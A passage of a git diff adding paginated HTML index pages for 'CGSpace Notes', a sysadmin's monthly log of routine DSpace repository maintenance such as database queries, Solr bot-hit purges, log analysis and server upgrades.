  • This will save us a few gigs of backup space we’re paying for on S3
  • +
  • Also, I noticed the checker log has some errors we should pay attention to:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2016

+ +
+

2016-03-02

+
    +
  • Looking at issues with author authorities on CGSpace
  • +
  • For some reason we still have the index-lucene-update cron job active on CGSpace, but I’m pretty sure we don’t need it as of the latest few versions of Atmire’s Listings and Reports module
  • +
  • Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2016

+ +
+

2016-02-05

+
    +
  • Looking at some DAGRIS data for Abenet Yabowork
  • +
  • Lots of issues with spaces, newlines, etc causing the import to fail
  • +
  • I noticed we have a very interesting list of countries on CGSpace:
  • +
+

CGSpace country list

+
    +
  • Not only are there 49,000 countries, we have some blanks (25)…
  • +
  • Also, lots of things like “COTE D`LVOIRE” and “COTE D IVOIRE”
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2016

+ +
+

2016-01-13

+
    +
  • Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_collections.sh script I wrote last year.
  • +
  • I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
  • +
  • Update GitHub wiki for documentation of maintenance tasks.
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2015

+ +
+

2015-12-02

+
    +
  • Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less space:
  • +
+
# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+
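  • The change itself is just swapping the compressor in the log rotation cron job; a sketch using the same file as the listing above (the actual cron entry may differ):
  • +
+
# xz /home/dspacetest.cgiar.org/log/dspace.log.2015-11-18
+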
+ Read more → +
+ + + + + + +
+
+

November, 2015

+ +
+

2015-11-22

+
    +
  • CGSpace went down
  • +
  • Looks like DSpace exhausted its PostgreSQL connection pool
  • +
  • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
  • +
+
$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
+78
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/2/index.html b/docs/page/2/index.html new file mode 100644 index 000000000..1f046c236 --- /dev/null +++ b/docs/page/2/index.html @@ -0,0 +1,449 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

September, 2022

+ +
+

2022-09-01

+
    +
  • A bit of work on the “Mapping CG Core–CGSpace–MEL–MARLO Types” spreadsheet
  • +
  • I tested an item submission on DSpace Test with the Cocoon org.apache.cocoon.uploads.autosave=false change +
      +
    • The submission works as expected
    • +
    +
  • +
  • Start debugging some region-related issues with csv-metadata-quality +
      +
    • I created a new test file test-geography.csv with some different scenarios
    • +
    • I also fixed a few bugs and improved the region-matching logic
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

July, 2022

+ +
+

2022-07-02

+
    +
  • I learned how to use the Levenshtein functions in PostgreSQL +
      +
    • The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
    • +
    • Also, the trgm functions I’ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lowercase both strings first (see the sketch below)
    • +
    +
  • +
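  • A minimal sketch of that truncation and lower-casing, assuming the fuzzystrmatch extension and two hypothetical title strings:
  • +
+
$ psql -d dspace -c "CREATE EXTENSION IF NOT EXISTS fuzzystrmatch"
+$ psql -d dspace -c "SELECT levenshtein(lower(left('A Hypothetical Title', 255)), lower(left('a hypothetical title', 255)))"
+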
+ Read more → +
+ + + + + + +
+
+

June, 2022

+ +
+

2022-06-06

+
    +
  • Look at the Solr statistics on CGSpace +
      +
    • I see 167,000 hits from a bunch of Microsoft IPs with reverse DNS “msnbot-” using the Solr query dns:*msnbot* AND dns:*.msn.com
    • +
    • I purged these first so I could see the other “real” IPs in the Solr facets (a delete-by-query sketch follows below)
    • +
    +
  • +
  • I see 47,500 hits from 80.248.237.167 on a data center ISP in Sweden, using a normal user agent
  • +
  • I see 13,000 hits from 163.237.216.11 on a data center ISP in Australia, using a normal user agent
  • +
  • I see 7,300 hits from 208.185.238.57 from Britanica, using a normal user agent +
      +
    • There seem to be many more of these:
    • +
    +
  • +
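  • For reference, a purge matching that DNS pattern can be expressed as a Solr delete-by-query against the statistics core (a sketch; the host and port are assumptions, and this is not necessarily how the purge was actually run):
  • +
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*msnbot* AND dns:*.msn.com</query></delete>"
+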
+ Read more → +
+ + + + + + +
+
+

May, 2022

+ +
+

2022-05-04

+
    +
  • I found a few more IPs making requests using the shady Chrome 44 user agent in the last few days so I will add them to the block list too: +
      +
    • 18.207.136.176
    • +
    • 185.189.36.248
    • +
    • 50.118.223.78
    • +
    • 52.70.76.123
    • +
    • 3.236.10.11
    • +
    +
  • +
  • Looking at the Solr statistics for 2022-04 +
      +
    • 52.191.137.59 is Microsoft, but they are using a normal user agent and making tens of thousands of requests
    • +
    • 64.39.98.62 is owned by Qualys, and all their requests are probing for /etc/passwd etc
    • +
    • 185.192.69.15 is in the Netherlands and is using a normal user agent, but making excessive automated HTTP requests to paths forbidden in robots.txt
    • +
    • 157.55.39.159 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • 52.233.67.176 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 157.55.39.144 is owned by Microsoft and uses a normal user agent, but making excessive automated HTTP requests
    • +
    • 207.46.13.177 is owned by Microsoft and identifies as bingbot so I don’t know why its requests were logged in Solr
    • +
    • If I query Solr for time:2022-04* AND dns:*msnbot* AND dns:*.msn.com. I see a handful of IPs that made 41,000 requests
    • +
    +
  • +
  • I purged 93,974 hits from these IPs using my check-spider-ip-hits.sh script
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2022

+ +
+ 2022-04-01 I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54. + Read more → 
+ + + + + + +
+
+

March, 2022

+ +
+

2022-03-01

+
    +
  • Send Gaia the last batch of potential duplicates for items 701 to 980:
  • +
+
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
+$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
+$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
+$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
+
+ Read more → +
+ + + + + + +
+
+

February, 2022

+ +
+

2022-02-01

+
    +
  • Meeting with Peter and Abenet about CGSpace in the One CGIAR +
      +
    • We agreed to buy $5,000 worth of credits from Atmire for future upgrades
    • +
    • We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
    • +
    • We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
    • +
    • We agreed to try to do more alignment of affiliations/funders with ROR
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

December, 2021

+ +
+

2021-12-01

+
    +
  • Atmire merged some changes I had submitted to the COUNTER-Robots project
  • +
  • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
+Purging 1989 hits from The Knowledge AI in statistics
+Purging 1235 hits from MaCoCu in statistics
+Purging 455 hits from WhatsApp in statistics
+
+Total number of bot hits purged: 3679
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/3/index.html b/docs/page/3/index.html new file mode 100644 index 000000000..6a3a18908 --- /dev/null +++ b/docs/page/3/index.html @@ -0,0 +1,444 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

November, 2021

+ +
+

2021-11-02

+
    +
  • I experimented with manually sharding the Solr statistics on DSpace Test
  • +
  • First I exported all the 2019 stats from CGSpace:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics -f 'time:2019-*' -a export -o statistics-2019.json -k uid
+$ zstd statistics-2019.json
+
+ Read more → +
+ + + + + + +
+
+

October, 2021

+ +
+

2021-10-01

+
    +
  • Export all affiliations on CGSpace and run them against the latest RoR data dump:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
+ations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
    +
  • So we have 1879/7100 (26.46%) matching already
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2021

+ +
+

2021-09-02

+
    +
  • Troubleshooting the missing Altmetric scores on AReS +
      +
    • Turns out that I didn’t actually fix them last month because the check for content.altmetric still exists, and I can’t access the DOIs using _h.source.DOI for some reason
    • +
    • I can access all other kinds of item metadata using the Elasticsearch label, but not DOI!!!
    • +
    • I will change DOI to tomato in the repository setup and start a re-harvest… I need to see if this is some kind of reserved word or something…
    • +
    • Even as tomato I can’t access that field as _h.source.tomato in Angular, but it does work as a filter source… sigh
    • +
    +
  • +
  • I’m having problems using the OpenRXV API +
      +
    • The syntax Moayad showed me last month doesn’t seem to honor the search query properly…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2021

+ +
+

2021-08-01

+
    +
  • Update Docker images on AReS server (linode20) and reboot the server:
  • +
+
# docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
+
    +
  • I decided to upgrade linode20 from Ubuntu 18.04 to 20.04
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2021

+ +
+

2021-07-01

+
    +
  • Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+
+ Read more → +
+ + + + + + +
+
+

June, 2021

+ +
+

2021-06-01

+
    +
  • IWMI notified me that AReS was down with an HTTP 502 error +
      +
    • Looking at UptimeRobot I see it has been down for 33 hours, but I never got a notification
    • +
    • I don’t see anything in the Elasticsearch container logs, or the systemd journal on the host, but I notice that the angular_nginx container isn’t running
    • +
    • I simply started it and AReS was running again:
    • +
    +
  • +
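  • A sketch of starting that container by name (assuming the angular_nginx name mentioned above; the exact command used may have differed):
  • +
+
# docker start angular_nginx
+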
+ Read more → +
+ + + + + + +
+
+

May, 2021

+ +
+

2021-05-01

+
    +
  • I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +
      +
    • “RI/1.0”, 1337
    • +
    • “Microsoft Office Word 2014”, 941
    • +
    +
  • +
  • I will add the RI/1.0 pattern to our DSpace agents overload and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user…
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2021

+ +
+

2021-04-01

+
    +
  • I wrote a script to query Sherpa’s API for our ISSNs: sherpa-issn-lookup.py +
      +
    • I’m curious to see how the results compare with the results from Crossref yesterday
    • +
    +
  • +
  • AReS Explorer was down since this morning, I didn’t see anything in the systemd journal +
      +
    • I simply took everything down with docker-compose and then back up, and then it was OK
    • +
    • Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2021

+ +
+

2021-03-01

+
    +
  • Discuss some OpenRXV issues with Abdullah from CodeObia +
      +
    • He’s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API
    • +
    • Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/4/index.html b/docs/page/4/index.html new file mode 100644 index 000000000..de782cd91 --- /dev/null +++ b/docs/page/4/index.html @@ -0,0 +1,464 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

February, 2021

+ +
+

2021-02-01

+
    +
  • Abenet said that CIP found more duplicate records in their export from AReS + +
  • +
  • I had a call with CodeObia to discuss the work on OpenRXV
  • +
  • Check the results of the AReS harvesting from last night:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
+{
+  "count" : 100875,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
+ Read more → +
+ + + + + + +
+
+

January, 2021

+ +
+

2021-01-03

+
    +
  • Peter notified me that some filters on AReS were broken again +
      +
    • It’s the same issue with the field names getting .keyword appended to the end that I already filed an issue on OpenRXV about last month
    • +
    • I fixed the broken filters (careful to not edit any others, lest they break too!)
    • +
    +
  • +
  • Fix an issue with start page number for the DSpace REST API and statistics API in OpenRXV +
      +
    • The start page had been “1” in the UI, but in the backend they were doing some gymnastics to adjust to the zero-based offset/limit/page of the DSpace REST API and the statistics API
    • +
    • I adjusted it to default to 0 and added a note to the admin screen
    • +
    • I realized that this issue was actually causing the first page of 100 statistics to be missing…
    • +
    • For example, this item has 51 views on CGSpace, but 0 on AReS
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2020

+ +
+

2020-12-01

+
    +
  • Atmire responded about the issue with duplicate data in our Solr statistics +
      +
    • They noticed that some records in the statistics-2015 core haven’t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven’t migrated any of the records yet
    • +
    • That’s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, as according to the cua_version field
    • +
    • I started processing those (about 411,000 records):
    • +
    +
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

November, 2020

+ +
+

2020-11-01

+
    +
  • Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test +
      +
    • So far we’ve spent at least fifty hours to process the statistics and statistics-2019 core… wow.
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

October, 2020

+ +
+

2020-10-06

+
    +
  • Add tests for the new /items POST handlers to the DSpace 6.x branch of my dspace-statistics-api + +
  • +
  • Trying to test the changes Atmire sent last week but I had to re-create my local database from a recent CGSpace dump +
      +
    • During the FlywayDB migration I got an error:
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

September, 2020

+ +
+

2020-09-02

+
    +
  • Replace Marissa van Epp with Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS
  • +
  • The AReS Explorer hasn’t updated its index since 2020-08-22 when I last forced it +
      +
    • I restarted it again now and told Moayad that the automatic indexing isn’t working
    • +
    +
  • +
  • Add Alliance of Bioversity International and CIAT to affiliations on CGSpace
  • +
  • Abenet told me that the general search text on AReS doesn’t get reset when you use the “Reset Filters” button + +
  • +
  • I filed an issue on OpenRXV to make some minor edits to the admin UI: https://github.com/ilri/OpenRXV/issues/40
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2020

+ +
+

2020-08-02

+
    +
  • I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values +
      +
    • It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter’s preferred “display” country names)
    • +
    • It implements a “force” mode too that will clear existing country codes and re-tag everything
    • +
    • It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa…
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2020

+ +
+

2020-07-01

+
    +
  • A few users noticed that CGSpace wasn’t loading items today; item pages seem blank +
      +
    • I looked at the PostgreSQL locks but they don’t seem unusual
    • +
    • I guess this is the same “blank item page” issue that we had a few times in 2019 that we never solved
    • +
    • I restarted Tomcat and PostgreSQL and the issue was gone
    • +
    +
  • +
  • Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2020

+ +
+

2020-06-01

+
    +
  • I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday +
      +
    • I sent Atmire the dspace.log from today and told them to log into the server to debug the process
    • +
    +
  • +
  • In other news, I checked the statistics API on DSpace 6 and it’s working
  • +
  • I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/5/index.html b/docs/page/5/index.html new file mode 100644 index 000000000..bac4d20f8 --- /dev/null +++ b/docs/page/5/index.html @@ -0,0 +1,492 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

May, 2020

+ +
+

2020-05-02

+
    +
  • Peter said that CTA is having problems submitting an item to CGSpace +
      +
    • Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see that the number of connections in ‘idle in transaction’ and ‘waiting for lock’ states is increasing again (a quick count by state is sketched below)
    • +
    • I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)
    • +
    +
  • +
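  • A quick way to count connections by state, in the spirit of the pg_stat_activity checks elsewhere in these notes (a sketch):
  • +
+
$ psql -c "SELECT state, count(*) FROM pg_stat_activity GROUP BY state;"
+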
+ Read more → +
+ + + + + + +
+
+

April, 2020

+ +
+

2020-04-02

+
    +
  • Maria asked me to update Charles Staver’s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it +
      +
    • I updated the fifty-eight existing items on CGSpace
    • +
    +
  • +
  • Looking into the items Udana had asked about last week that were missing Altmetric donuts: + +
  • +
  • On the same note, the one item Abenet pointed out last week now has a donut with score of 104 after I tweeted it last week
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

February, 2020

+ +
+

2020-02-02

+
    +
  • Continue working on porting CGSpace’s DSpace 5 code to DSpace 6.3 that I started yesterday +
      +
    • Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
    • +
    • I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
    • +
    • Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
    • +
    • The code finally builds and runs with a fresh install
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2020

+ +
+

2020-01-06

+
    +
  • Open a ticket with Atmire to request a quote for the upgrade to DSpace 6
  • +
  • Last week Altmetric responded about the item that had a lower score than its DOI +
      +
    • The score is now linked to the DOI
    • +
    • Another item that had the same problem in 2019 has now also linked to the score for its DOI
    • +
    • Another item that had the same problem in 2019 has also been fixed
    • +
    +
  • +
+

2020-01-07

+
    +
  • Peter Ballantyne highlighted one more WLE item that is missing the Altmetric score that its DOI has +
      +
    • The DOI has a score of 259, but the Handle has no score at all
    • +
    • I tweeted the CGSpace repository link
    • +
    +
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2019

+ +
+

2019-12-01

+
    +
  • Upgrade CGSpace (linode18) to Ubuntu 18.04: +
      +
    • Check any packages that have residual configs and purge them:
    • +
    • # dpkg -l | grep -E '^rc' | awk '{print $2}' | xargs dpkg -P
    • +
    • Make sure all packages are up to date and the package manager is up to date, then reboot:
    • +
    +
  • +
+
# apt update && apt full-upgrade
+# apt-get autoremove && apt-get autoclean
+# dpkg -C
+# reboot
+
+ Read more → +
+ + + + + + +
+
+

November, 2019

+ +
+

2019-11-04

+
    +
  • Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics +
      +
    • I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
+1277694
+
    +
  • So 4.6 million from XMLUI and another 1.2 million from API requests
  • +
  • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
  • +
+
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
+106781
+
+ Read more → +
+ + + + + + +
+
+

October, 2019

+ +
+ 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruit we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unnecessary Unicode” fix: $ csvcut -c 'id,dc. + Read more → 
+ + + + + + +
+
+

September, 2019

+ +
+

2019-09-01

+
    +
  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
  • +
  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+
+ Read more → +
+ + + + + + +
+
+

August, 2019

+ +
+

2019-08-03

+
    +
  • Look at Bioversity’s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name…
  • +
+

2019-08-04

+
    +
  • Deploy ORCID identifier updates requested by Bioversity to CGSpace
  • +
  • Run system updates on CGSpace (linode18) and reboot it +
      +
    • Before updating it I checked Solr and verified that all statistics cores were loaded properly (a quick check is sketched below)…
    • +
    • After rebooting, all statistics cores were loaded… wow, that’s lucky.
    • +
    +
  • +
  • Run system updates on DSpace Test (linode19) and reboot it
  • +
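  • One way to check that the statistics cores are loaded is via Solr’s core admin API (a sketch; the host and port are assumptions):
  • +
+
$ curl -s 'http://localhost:8081/solr/admin/cores?action=STATUS&wt=json' | python3 -m json.tool | grep '"name"'
+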
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/page/6/index.html b/docs/page/6/index.html new file mode 100644 index 000000000..a25e62091 --- /dev/null +++ b/docs/page/6/index.html @@ -0,0 +1,488 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

July, 2019

+ +
+

2019-07-01

+
    +
  • Create an “AfricaRice books and book chapters” collection on CGSpace for AfricaRice
  • +
  • Last month Sisay asked why the following “most popular” statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace: + +
  • +
  • Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
  • +
+ Read more → +
+ + + + + + + + + + + + + +
+
+

May, 2019

+ +
+

2019-05-01

+
    +
  • Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
  • +
  • A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items +
      +
    • Apparently if the item is in the workflowitem table it is submitted to a workflow
    • +
    • And if it is in the workspaceitem table it is in the pre-submitted state
    • +
    +
  • +
  • The item seems to be in a pre-submitted state, so I tried to delete it from there:
  • +
+
dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
    +
  • But after this I tried to delete the item from the XMLUI and it is still present…
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2019

+ +
+

2019-04-01

+
    +
  • Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +
      +
    • They asked if we had plans to enable RDF support in CGSpace
    • +
    +
  • +
  • There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +
      +
    • I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!
    • +
    +
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
    +
  • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
  • +
  • Apply country and region corrections and deletions on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
+
+ Read more → +
+ + + + + + +
+
+

March, 2019

+ +
+

2019-03-01

+
    +
  • I checked IITA’s 259 Feb 14 records from last month for duplicates using Atmire’s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good
  • +
  • I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc…
  • +
  • Looking at the other half of Udana’s WLE records from 2018-11 +
      +
    • I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)
    • +
    • I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items
    • +
    • Most worryingly, there are encoding errors in the abstracts for eleven items, for example:
    • +
    • 68.15% � 9.45 instead of 68.15% ± 9.45
    • +
    • 2003�2013 instead of 2003–2013
    • +
    +
  • +
  • I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
  • +
+ Read more → +
+ + + + + + +
+
+

February, 2019

+ +
+

2019-02-01

+
    +
  • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
  • +
  • The top IPs before, during, and after this latest alert tonight were:
  • +
+
